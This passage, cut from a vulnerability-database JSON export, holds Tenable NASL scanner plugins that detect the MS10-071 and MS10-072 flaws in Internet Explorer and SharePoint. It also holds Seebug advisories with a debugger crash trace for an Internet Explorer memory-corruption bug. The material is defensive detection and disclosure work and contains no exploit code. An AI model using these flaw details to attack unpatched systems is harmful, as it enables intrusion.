bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18304\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.22753\", min_version:\"7.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.18522\", min_version:\"7.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.18972\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17091\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4772\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.18972\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17091\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6036\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n )\n{\n set_kb_item(name:\"SMB/Missing/MS10-071\", value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:52:49", "description": "The version of SharePoint Services, SharePoint Server installed on the remote host has multiple cross-site scripting vulnerabilities.\n\nA remote attacker could exploit them by tricking a user into making a malicious request, resulting in arbitrary script code execution.", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "nessus", "title": "MS10-072: Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3243", "CVE-2010-3324"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_services", "cpe:/a:microsoft:sharepoint_foundation", "cpe:/a:microsoft:sharepoint_server"], "id": "SAFEHTML_MS10_072.NASL", "href": "https://www.tenable.com/plugins/nessus/49999", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49999);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3243\", \"CVE-2010-3324\");\n script_bugtraq_id(42467, 43703);\n script_xref(name:\"MSFT\", value:\"MS10-072\");\n script_xref(name:\"MSKB\", value:\"2345212\");\n script_xref(name:\"MSKB\", value:\"2345304\");\n script_xref(name:\"MSKB\", value:\"2345322\");\n script_xref(name:\"MSKB\", value:\"2346298\");\n script_xref(name:\"MSKB\", value:\"2346411\");\n\n script_name(english:\"MS10-072: Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048) (remote check)\");\n script_summary(english:\"SharePoint Services anonymous web banner check\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is affected by multiple cross-site scripting\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of SharePoint Services, SharePoint Server installed on\nthe remote host has multiple cross-site scripting vulnerabilities.\n\nA remote attacker could exploit them by tricking a user into making a\nmalicious request, resulting in arbitrary script code execution.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-072\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for SharePoint Services 3.0 and\nSharePoint Server 2007.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2010/Aug/178\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_services\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_require_ports(\"Services/www\", 80);\n script_dependencies(\"http_version.nasl\", \"sharepoint_detect.nasl\");\n script_require_keys(\"www/ASP\", \"www/sharepoint\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif ( get_kb_item(\"SMB/dont_send_in_cleartext\") ) exit(0);\n\nport = get_http_port(default:80, asp:TRUE);\nsharepoint = get_install_from_kb(appname:'sharepoint', port:port, exit_on_fail:TRUE);\n\nurl = sharepoint['dir'] + \"/default.aspx\";\n\nres = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n username:kb_smb_login(),\n password:kb_smb_password(),\n exit_on_fail:TRUE\n);\n\n# When running SharePoint Services 3.0, the HTTP header version does not get updated\n# on all ports. We'll only do the version check on the service where it is updated\nif ('Home - Central Administration' >!< res[2])\n exit(1, 'Unable to compare version from port '+port);\n\nversion = eregmatch(pattern:\"MicrosoftSharePointTeamServices: ([0-9\\.]+)\", string:res[1]);\nif (isnull(version))\n{\n exit(1, \"MicrosoftSharePointTeamServices not found on port \" + port + \".\");\n}\n\nbuild = eregmatch(pattern:\"([0-9]+)\\.[0-9]+\\.[0-9]+\\.([0-9]+)\", string:version[1]);\nif (isnull(build))\n{\n exit(1, \"Cannot extract the version from \"+ version[1]+\" for the SharePoint Server listening on port \"+port+\".\");\n}\n\nif (int(build[1]) == 12 && int(build[2]) >= 6421 && int(build[2]) < 6545)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version[1] +\n '\\n Fixed version : 12.0.0.6545\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n exit(0);\n}\nelse exit(0, 'SharePoint Server v' + version[1] + ' is listening on port ' + port + ' and is not affected.');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:52:54", "description": "The versions of SharePoint Services, SharePoint Server, Groove, or Office Web Apps installed on the remote host have multiple cross-site scripting vulnerabilities.\n\nA remote attacker could exploit them by tricking a user into making a malicious request, resulting in arbitrary script code execution.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "nessus", "title": "MS10-072: Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3243", "CVE-2010-3324"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-072.NASL", "href": "https://www.tenable.com/plugins/nessus/49949", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49949);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-3243\", \"CVE-2010-3324\");\n script_bugtraq_id(42467, 43703);\n script_xref(name:\"MSFT\", value:\"MS10-072\");\n script_xref(name:\"MSKB\", value:\"2345212\");\n script_xref(name:\"MSKB\", value:\"2345304\");\n script_xref(name:\"MSKB\", value:\"2345322\");\n script_xref(name:\"MSKB\", value:\"2346298\");\n script_xref(name:\"MSKB\", value:\"2346411\");\n\n script_name(english:\"MS10-072: Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)\");\n script_summary(english:\"Checks SharePoint / Groove / Office Web Apps version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple cross-site scripting\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The versions of SharePoint Services, SharePoint Server, Groove, or\nOffice Web Apps installed on the remote host have multiple cross-site\nscripting vulnerabilities.\n\nA remote attacker could exploit them by tricking a user into making a\nmalicious request, resulting in arbitrary script code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2010/Aug/178\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-072\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for SharePoint Services 3.0,\nSharePoint Foundation 2010, SharePoint Server 2007, Groove Server\n2010, and Office Web Apps.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"groove_server_installed.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-072';\nkbs = make_list(\"2345212\", \"2345304\", \"2345322\", \"2346298\", \"2346411\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\n\nget_kb_item_or_exit(\"SMB/WindowsVersion\");\n\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, \"IPC$\");\n}\n\n\n# Connect to remote registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n audit(AUDIT_REG_FAIL);\n}\n\n# Determine where it's installed.\nsharepoint_path = NULL;\nowa_path = NULL;\n\nkey = \"SOFTWARE\\Microsoft\\Shared Tools\\Web Server Extensions\\12.0\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\n\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:\"Location\");\n if (!isnull(value))\n sharepoint_path = value[1];\n\n RegCloseKey(handle:key_h);\n}\n\n# Check SharePoint 2010 if 2007 wasn't detected\nif (isnull(sharepoint_path))\n{\n key = \"SOFTWARE\\Microsoft\\Shared Tools\\Web Server Extensions\\14.0\";\n key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\n\n if (!isnull(key_h))\n {\n value = RegQueryValue(handle:key_h, item:\"Location\");\n if (!isnull(value))\n sharepoint_path = value[1];\n\n RegCloseKey(handle:key_h);\n }\n}\n\n# Check Office Web Apps\nkey = \"SOFTWARE\\Microsoft\\Office Server\\14.0\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:\"InstallPath\");\n if (!isnull(value))\n owa_path = value[1];\n\n RegCloseKey(handle:key_h);\n}\n\nRegCloseKey(handle:hklm);\nNetUseDel (close:FALSE);\n\nsharepointserver_exe = NULL;\n\nkb = '';\nif (sharepoint_path)\n{\n sharepointserver_exe = sharepoint_path + '\\\\Microsoft.Office.Server.Conversions.Launcher.exe';\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:sharepoint_path);\n dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\BIN\\Mssph.dll\", string:sharepoint_path);\n\n r = NetUseAdd(share:share);\n if ( r != 1 )\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n handle = CreateFile (file:dll, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_NORMAL, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n if ( ! isnull(handle) )\n {\n sharepoint_ver = GetFileVersion(handle:handle);\n CloseFile(handle:handle);\n }\n # Determine if this is Sharepoint Server or Sharepoint Services\n handle = CreateFile (file:sharepointserver_exe, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_NORMAL, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n if ( ! isnull(handle) )\n {\n kb = '2345212';\n CloseFile(handle:handle);\n }\n else kb = '2345304';\n}\nNetUseDel();\n\nreport = \"\";\n\nif (!isnull(sharepoint_ver))\n{\n # Versions < 12.0.6544.5000\n v = sharepoint_ver;\n if (\n v[0] == 12 && v[1] == 0 && (v[2] < 6544 || (v[2] == 6544 && v[3] < 5000))\n )\n {\n info =\n '\\n Product : SharePoint Server 2007 / SharePoint Services 3.0\\n'+\n ' Path : ' + sharepoint_path + \"\\bin\\mssph.dll\"+ '\\n' +\n ' Installed version : ' + join(v, sep:'.') + '\\n' +\n ' Fixed version : 12.0.6544.5000\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:kb);\n vuln = TRUE;\n }\n\n # Versions < 14.0.5123.5000\n if (v[0] == 14 && v[1] == 0 && (v[2] < 5123 || (v[2] == 5123 && v[3] < 5000)))\n {\n info =\n '\\n Product : SharePoint Foundation 2010\\n'+\n ' Path : ' + sharepoint_path + \"\\bin\\mssph.dll\"+ '\\n' +\n ' Installed version : ' + join(v, sep:'.') + '\\n' +\n ' Fixed version : 14.0.5123.5000\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2345322');\n vuln = TRUE;\n }\n}\n\nif (owa_path)\n{\n share = owa_path[0] + '$';\n if (is_accessible_share(share:share))\n {\n owa_path = owa_path + \"\\WebServices\\ConversionService\\Bin\\Converter\";\n old_report = hotfix_get_report();\n\n if (hotfix_is_vulnerable(file:\"msoserver.dll\", version:\"14.0.5120.5000\", min_version:\"14.0.0.0\", path:owa_path))\n {\n file = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", string:owa_path, replace:\"\\1\\msoserver.dll\");\n kb_name = \"SMB/FileVersions/\"+tolower(share-'$')+tolower(str_replace(string:file, find:\"\\\", replace:\"/\"));\n version = get_kb_item(kb_name);\n\n info =\n '\\n Product : Office Web Apps 2010' +\n '\\n Path : ' + owa_path + '\\\\msoserver.dll' +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5120.5000' + '\\n';\n\n hcf_report = '';\n hotfix_add_report(old_report + info, bulletin:bulletin, kb:'2346411');\n vuln = TRUE;\n }\n }\n else debug_print('is_accessible_share() failed on ' + owa_path);\n}\n\n# Groove Server\npaths = get_kb_list(\"SMB/groove_server/path\");\nif (paths)\n{\n # I think there can be one Groove Server install at most, but we'll\n # assume there can be multiple to be on the safe side\n foreach path (make_list(paths))\n {\n share = path[0] + '$';\n if (!is_accessible_share(share:share))\n {\n debug_print('is_accessible_share() failed on ' + path);\n continue;\n }\n\n old_report = hotfix_get_report();\n\n if (hotfix_is_vulnerable(file:\"Groovems.dll\", version:\"14.0.5123.5000\", min_version:\"14.0.0.0\", path:path))\n {\n file = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", string:path, replace:\"\\1\\Groovems.dll\");\n kb_name = \"SMB/FileVersions/\"+tolower(share-'$')+tolower(str_replace(string:file, find:\"\\\", replace:\"/\"));\n version = get_kb_item(kb_name);\n\n info =\n '\\n Product : Groove Server 2010' +\n '\\n Path : ' + path + '\\\\Groovems.dll' +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5123.5000' + '\\n';\n\n hcf_report = '';\n hotfix_add_report(old_report + info, bulletin:bulletin, kb:'2346298');\n vuln = TRUE;\n }\n }\n\n}\n\nhotfix_check_fversion_end();\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/MS10-072', value:TRUE);\n set_kb_item(name: 'www/0/XSS', value: TRUE);\n hotfix_security_warning();\n}\nelse exit(0, 'The host is not affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T18:08:18", "description": "BUGTRAQ ID: 43696,43705,43706,43707\r\nCVE ID: CVE-2010-3326,CVE-2010-3328,CVE-2010-3329,CVE-2010-3331\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u8bbf\u95ee\u672a\u6b63\u786e\u521d\u59cb\u5316\u6216\u5df2\u88ab\u5220\u9664\u7684\u5bf9\u8c61\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u6784\u5efa\u7279\u5236\u7684\u7f51\u9875\u6765\u5229\u7528\u8be5\u6f0f\u6d1e\uff0c\u5f53\u7528\u6237\u67e5\u770b\u7f51\u9875\u65f6\uff0c\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u83b7\u5f97\u4e0e\u767b\u5f55\u7528\u6237\u76f8\u540c\u7684\u7528\u6237\u6743\u9650\u3002\u5982\u679c\u7528\u6237\u4f7f\u7528\u7ba1\u7406\u7528\u6237\u6743\u9650\u767b\u5f55\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\n\nMicrosoft Internet Explorer 8.0\r\nMicrosoft Internet Explorer 7.0\r\nMicrosoft Internet Explorer 6.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5c06Internet Explorer\u914d\u7f6e\u4e3a\u5728Internet\u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n \r\n* \u5c06Internet \u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u8bbe\u4e3a\u201c\u9ad8\u201d\uff0c\u4ee5\u4fbf\u5728\u8fd9\u4e9b\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "cvss3": {}, "published": "2010-10-15T00:00:00", "type": "seebug", "title": "Microsoft IE\u591a\u4e2a\u672a\u521d\u59cb\u5316\u5185\u5b58\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08MS10-071\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3326", "CVE-2010-3328", "CVE-2010-3329", "CVE-2010-3331"], "modified": "2010-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20170", "id": "SSV:20170", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:08:07", "description": "BUGTRAQ ID: 43704\r\nCVE ID: CVE-2010-3327\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406Anchor\u5143\u7d20\u5bfc\u81f4\u4e86\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u3002\u5728\u7528\u6237\u64cd\u4f5c\u671f\u95f4\u7c98\u8d34\u548c\u7f16\u8f91\u5185\u5bb9\u65f6\u5982\u679c\u6ca1\u6709\u79fb\u9664Anchor\u5143\u7d20\u5c31\u4f1a\u51fa\u73b0\u8fd9\u79cd\u884c\u4e3a\uff0c\u53ef\u80fd\u6cc4\u9732\u672c\u5e94\u5220\u9664\u7684\u4e2a\u4eba\u53ef\u8bc6\u522b\u4fe1\u606f\u3002\n\nMicrosoft Internet Explorer 8.0\r\nMicrosoft Internet Explorer 7.0\r\nMicrosoft Internet Explorer 6.0\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "published": "2010-10-15T00:00:00", "type": "seebug", "title": "Microsoft IE Anchor\u5143\u7d20\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff08MS10-071\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3327"], "modified": "2010-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20167", "id": "SSV:20167", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:07:59", "description": "BUGTRAQ ID: 43706\r\nCVE ID: CVE-2010-3329\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nWindows\u5728\u5b9e\u4f8b\u5316Office\u6587\u6863\uff08\u5982.XLS\u3001.DOC\uff09\u4e2dHtmlDlgHelper\u7c7b\u5bf9\u8c61\uff08CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b\uff09\u7684\u65b9\u5f0f\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\u3002\u6709\u6f0f\u6d1e\u7684\u6a21\u5757\u662fInternet Explorer\u4e2d\u7684mshtmled.dll\uff0c\u5f53\u8c03\u7528CHtmlDlgHelper\u7c7b\u7684\u6790\u6784\u7a0b\u5e8f\u4e4b\u540e\u8bbf\u95ee\u672a\u521d\u59cb\u5316\u5185\u5b58\u65f6\u5c31\u4f1a\u5728mshtmled.dll \u4e2d\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\u3002\u4ee5\u4e0b\u662f\u51fa\u73b0\u4e86\u6f0f\u6d1e\u7684\u4ee3\u7801\u6bb5\uff1a\r\n\r\nmshtmled!ReleaseInterface:\r\n42b919c0 8bff mov edi,edi\r\n42b919c2 55 push ebp\r\n42b919c3 8bec mov ebp,esp\r\n42b919c5 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0013d104=00310065\r\n42b919c8 85c0 test eax,eax\r\n42b919ca 7406 je mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]\r\n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065\r\n42b919ce 50 push eax\r\n42b919cf ff5108 call dword ptr [ecx+8] ds:0023:7d02029c=2a2c277a\r\n\r\neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000\r\neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\n\r\nStack Trace:\r\n<Unloaded_ion.dll>+0x2a2c2779\r\nmshtmled!ReleaseInterface+0x12\r\nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27\r\nVBE6!rtcStrConvVar+0xbd65\r\nVBE6!rtcSetDatabaseLcid+0xa823\r\nEXCEL!Ordinal41+0xd2ad0\r\nEXCEL!Ordinal41+0x14082a\r\nUSER32!CallWindowProcW+0x1b\r\nInstruction Address: 0x000000002a2c277a\n\nMicrosoft Internet Explorer 8.0\r\nMicrosoft Internet Explorer 7.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u6b62\u5728Internet Explorer\u4e2d\u8fd0\u884cCOM\u5bf9\u8c61\u3002\r\n \r\n\u5982\u679c\u8981\u5bf9CLSID\u503c{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}\u8bbe\u7f6ekill bit\uff0c\u5728\u6587\u672c\u7f16\u8f91\u5668\uff08\u5982\u5199\u5b57\u677f\uff09\u4e2d\u7c98\u8d34\u4ee5\u4e0b\u6587\u672c\u7136\u540e\u4f7f\u7528.reg\u6587\u4ef6\u540d\u6269\u5c55\u4fdd\u5b58\u6587\u4ef6\u3002\r\n\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\n\u901a\u8fc7\u53cc\u51fb\u5c06\u8fd9\u4e2a.reg\u6587\u4ef6\u5e94\u7528\u5230\u5355\u4e2a\u7cfb\u7edf\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "cvss3": {}, "published": "2010-10-15T00:00:00", "type": "seebug", "title": "Microsoft IE HtmlDlgHelper\u7c7b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff08MS10-071\uff09", 